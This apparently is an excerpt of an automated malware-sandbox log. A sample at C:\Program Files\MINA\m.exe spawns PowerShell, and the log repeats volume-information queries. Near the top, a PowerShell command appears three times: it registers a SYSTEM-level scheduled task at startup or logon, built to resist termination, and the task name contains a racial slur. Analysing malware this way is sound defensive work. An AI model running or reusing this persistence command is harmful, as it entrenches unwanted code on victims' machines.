                Source: C:\Program Files\MINA\m.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#zgpcu#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'mineineynigga' /tr '''c:\program files\mina\m.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\mina\m.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'mineineynigga' -user 'system' -runlevel 'highest' -force; }
                Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#kbbksn#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'mineineynigga' /tr '''c:\program files\mina\m.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\mina\m.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'mineineynigga' -user 'system' -runlevel 'highest' -force; }Jump to behavior
                Source: C:\Program Files\MINA\m.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#zgpcu#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'mineineynigga' /tr '''c:\program files\mina\m.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\mina\m.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'mineineynigga' -user 'system' -runlevel 'highest' -force; }Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
